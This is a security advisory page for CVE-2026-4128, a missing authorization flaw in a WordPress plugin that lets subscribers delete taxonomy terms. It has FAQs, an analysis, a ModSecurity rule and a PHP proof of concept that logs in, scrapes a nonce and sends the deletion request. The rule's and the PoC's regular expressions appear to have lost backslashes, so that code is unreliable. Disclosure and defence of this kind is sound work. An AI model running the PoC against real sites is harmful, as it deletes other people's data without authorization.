What is CVE-2026-4128?

CVE-2026-4128 is a medium severity vulnerability in the TP Restore Categories And Taxonomies plugin for WordPress, affecting all versions up to and including 1.0.1. It allows authenticated users with Subscriber-level access to delete taxonomy terms due to a missing authorization check in the AJAX action ‘tpmcattt_delete_term’.

How does the vulnerability work?

The vulnerability allows authenticated attackers to send a crafted AJAX request to delete taxonomy terms without proper capability checks. Although the request includes a valid nonce, the absence of a user permission verification means any authenticated user can exploit this flaw.

Who is affected by this vulnerability?

Any WordPress site using the TP Restore Categories And Taxonomies plugin version 1.0.1 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access and above can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the TP Restore Categories And Taxonomies plugin installed. If it is version 1.0.1 or earlier, your site is at risk. Additionally, review user roles to assess if any users have Subscriber or higher access.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-4128 is 4.3, classified as Medium severity. This indicates that while the vulnerability can be exploited, the impact is limited to data integrity without allowing privilege escalation or direct site takeover.

How can I mitigate or fix this vulnerability?

To mitigate this vulnerability, update the TP Restore Categories And Taxonomies plugin to the latest version that addresses the issue. Additionally, implement capability checks in the delete_term() function to restrict deletion permissions to authorized users only.

What are the potential consequences of exploitation?

Successful exploitation allows authenticated users to permanently delete taxonomy terms, leading to irreversible data loss. This can disrupt site functionality, especially if the deleted terms are crucial for content organization.

What is a nonce and how does it relate to this vulnerability?

A nonce is a security token used to verify that requests are legitimate and not forged. In this case, while the plugin checks for a valid nonce, it fails to verify user capabilities, making the nonce insufficient to prevent unauthorized actions.

How does the proof of concept demonstrate the issue?

The proof of concept code shows how an authenticated user can exploit the vulnerability by sending a POST request to the AJAX endpoint with the necessary parameters, including a valid nonce and term_id. This illustrates the ease of exploitation due to the missing authorization check.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider temporarily restricting access to the WordPress admin area or limiting user roles to prevent unauthorized access. Additionally, monitor user activities for any suspicious actions.

Are there any other security best practices to follow?

Always keep your WordPress plugins and themes updated to their latest versions. Implement the principle of least privilege by assigning users only the roles necessary for their tasks. Regularly review user access and permissions to maintain a secure environment.

Where can I find more information about this vulnerability?

For more detailed information about CVE-2026-4128, refer to the official CVE database or security advisories from trusted WordPress security resources. Additionally, the plugin’s repository may provide updates and patches related to this vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 23, 2026

CVE-2026-4128: TP Restore Categories And Taxonomies <= 1.0.1 – Missing Authorization to Authenticated (Subscriber+) Taxonomy Deletion via 'tpmcattt_delete_term' AJAX Action (tp-restore-categories-and-taxonomies)

CVE ID CVE-2026-4128

Plugin tp-restore-categories-and-taxonomies

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.0.1

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4128 (metadata-based):

Atomic Edge analysis identifies a missing authorization vulnerability in the TP Restore Categories And Taxonomies plugin for WordPress, affecting all versions up to and including 1.0.1. The plugin’s ‘tpmcattt_delete_term’ AJAX action allows authenticated attackers with Subscriber-level access to permanently delete taxonomy terms from the plugin’s trash/backup tables. The vulnerability carries a CVSS v3.1 base score of 4.3 (Medium), with a vector of AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N, indicating low impact but straightforward exploitation.

The root cause is a missing capability check in the delete_term() function that handles the ‘tpmcattt_delete_term’ AJAX action. Based on the CWE-862 classification and the vulnerability description, Atomic Edge infers that the function performs a nonce check via check_ajax_referer() but does not call current_user_can() or any equivalent permission verification. The nonce alone is insufficient because the plugin generates the nonce for all authenticated users through the admin_enqueue_scripts hook, exposing it on wp-admin pages accessible to subscribers (e.g., profile.php). This design flaw means any authenticated user can obtain a valid nonce and subsequently use it to trigger the term deletion. These conclusions are inferred from the CWE and description, as no source code diff is available for confirmation.

Exploitation requires an authenticated WordPress session. The attacker sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘tpmcattt_delete_term’, a valid nonce (obtainable from any wp-admin page), and a term_id parameter specifying the target taxonomy term to delete. The plugin does not restrict which term_id values are acceptable, allowing attackers to delete any term present in the plugin’s trash/backup tables. A crafted AJAX request with these parameters triggers the delete_term() function, which proceeds to delete the term without verifying the user’s capabilities.

Remediation requires implementing a proper capability check within the delete_term() function before processing term deletion. The plugin should call current_user_can() with an appropriate capability such as ‘manage_categories’ or ‘edit_posts’ to ensure only authorized users (e.g., Editors or Administrators) can delete taxonomy terms. Additionally, the nonce should be scoped to actions that match the required permission level, or the nonce generation should be restricted to admin pages that require higher privileges.

Successful exploitation allows authenticated attackers with Subscriber-level access to permanently delete taxonomy terms from the plugin’s backup tables. This results in irreversible data loss for the affected terms, which could include custom taxonomies essential for site categorization and content organization. The impact is limited to data integrity (low confidentiality impact, low availability impact) and does not allow privilege escalation or direct site takeover. However, the data loss can disrupt site functionality if the deleted terms are actively used in content classification.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20264128,phase:2,deny,status:403,chain,msg:'CVE-2026-4128 TP Restore Categories And Taxonomies AJAX term deletion exploitation',severity:'CRITICAL',tag:'CVE-2026-4128'"
SecRule ARGS_POST:action "@streq tpmcattt_delete_term" "chain"
SecRule ARGS_POST:term_id "@rx ^d+$" "t:none,id:20264129,phase:2,deny,status:403,msg:'CVE-2026-4128 term ID parameter detected'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4128 - TP Restore Categories And Taxonomies <= 1.0.1 - Missing Authorization to Authenticated (Subscriber+) Taxonomy Deletion via 'tpmcattt_delete_term' AJAX Action

// CONFIGURATION: Set your target WordPress site URL and credentials
$target_url = 'https://example.com';  // Replace with the target WordPress site URL
$username = 'subscriber';             // Replace with a valid subscriber username
$password = 'password';               // Replace with the subscriber's password

// Step 1: Authenticate and obtain cookies and nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/profile.php';  // Subscriber-accessible page where nonce is exposed

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract the nonce from profile.php (subscriber can access this page)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Extract nonce from the response.
// The nonce is likely stored in a JavaScript variable or hidden input.
// For this PoC, we search for the 'tpmcattt_delete_term' action nonce.
preg_match('/"_wpnonce"[^>]+value="([^"]+)"/', $response, $matches);
if (empty($matches)) {
    // Alternate: look for a script that defines the nonce
    preg_match('/nonces*[:=]s*"([^"]+)"/', $response, $matches);
}
$nonce = isset($matches[1]) ? $matches[1] : '';

if (empty($nonce)) {
    die("Error: Could not extract nonce from profile.php. The plugin may not expose it there or the page structure differs.n");
}

// Step 4: Send the AJAX request to delete a taxonomy term (term_id = 1 as example)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$term_id = '1';  // Replace with the target term ID to delete

$post_data = array(
    'action' => 'tpmcattt_delete_term',
    '_wpnonce' => $nonce,
    'term_id' => $term_id
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo "Response from server:n";
echo $response . "n";

// Clean up cookie file
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-4128?
Overview of the vulnerability
CVE-2026-4128 is a medium severity vulnerability in the TP Restore Categories And Taxonomies plugin for WordPress, affecting all versions up to and including 1.0.1. It allows authenticated users with Subscriber-level access to delete taxonomy terms due to a missing authorization check in the AJAX action ‘tpmcattt_delete_term’.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows authenticated attackers to send a crafted AJAX request to delete taxonomy terms without proper capability checks. Although the request includes a valid nonce, the absence of a user permission verification means any authenticated user can exploit this flaw.
Who is affected by this vulnerability?
Identifying vulnerable users and systems
Any WordPress site using the TP Restore Categories And Taxonomies plugin version 1.0.1 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access and above can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify affected installations
To check if your site is vulnerable, verify the version of the TP Restore Categories And Taxonomies plugin installed. If it is version 1.0.1 or earlier, your site is at risk. Additionally, review user roles to assess if any users have Subscriber or higher access.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-4128 is 4.3, classified as Medium severity. This indicates that while the vulnerability can be exploited, the impact is limited to data integrity without allowing privilege escalation or direct site takeover.
How can I mitigate or fix this vulnerability?
Recommended actions for administrators
To mitigate this vulnerability, update the TP Restore Categories And Taxonomies plugin to the latest version that addresses the issue. Additionally, implement capability checks in the delete_term() function to restrict deletion permissions to authorized users only.
What are the potential consequences of exploitation?
Impact of the vulnerability
Successful exploitation allows authenticated users to permanently delete taxonomy terms, leading to irreversible data loss. This can disrupt site functionality, especially if the deleted terms are crucial for content organization.
What is a nonce and how does it relate to this vulnerability?
Role of nonce in security
A nonce is a security token used to verify that requests are legitimate and not forged. In this case, while the plugin checks for a valid nonce, it fails to verify user capabilities, making the nonce insufficient to prevent unauthorized actions.
How does the proof of concept demonstrate the issue?
Understanding the provided exploit code
The proof of concept code shows how an authenticated user can exploit the vulnerability by sending a POST request to the AJAX endpoint with the necessary parameters, including a valid nonce and term_id. This illustrates the ease of exploitation due to the missing authorization check.
What should I do if I cannot update the plugin immediately?
Temporary measures to limit risk
If immediate updating is not possible, consider temporarily restricting access to the WordPress admin area or limiting user roles to prevent unauthorized access. Additionally, monitor user activities for any suspicious actions.
Are there any other security best practices to follow?
General recommendations for WordPress security
Always keep your WordPress plugins and themes updated to their latest versions. Implement the principle of least privilege by assigning users only the roles necessary for their tasks. Regularly review user access and permissions to maintain a secure environment.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information about CVE-2026-4128, refer to the official CVE database or security advisories from trusted WordPress security resources. Additionally, the plugin’s repository may provide updates and patches related to this vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations